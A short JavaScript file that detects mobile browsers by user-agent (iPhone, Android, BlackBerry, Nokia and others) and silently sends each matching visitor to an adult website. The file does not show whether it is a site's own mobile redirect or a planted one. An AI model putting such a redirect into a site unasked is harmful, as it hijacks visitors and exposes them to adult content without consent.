// JavaScript Document
<!--    
    if(navigator.userAgent.match(/iphone/i))
    {        
        //Iphone            
        location.replace("http://myiporno.com/");  
    }
    else if(navigator.userAgent.match(/ipod/i))
    {        
        //Ipod            
        location.replace("http://myiporno.com/");   
    }
    else if(navigator.userAgent.match(/android/i))
    {        
        //Android            
        location.replace("http://myiporno.com/");   
    }
    else if(navigator.userAgent.match(/opera mini/i))
    {        
        //Opera mini            
        location.replace("http://myiporno.com/");   
    }
    else if(navigator.userAgent.match(/blackberry/i))
    {        
        //BlackBerry            
        location.replace("http://myiporno.com/");   
    }
    else if(navigator.userAgent.match(/nokia/i))
    {        
        //Nokia            
        location.replace("http://myiporno.com/");   
    }
    else if(navigator.userAgent.match(/(up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|kindle|mobile|pda|psp|treo)/i))
    {        
        //Palm            
        location.replace("http://myiporno.com/");   
    }   
-->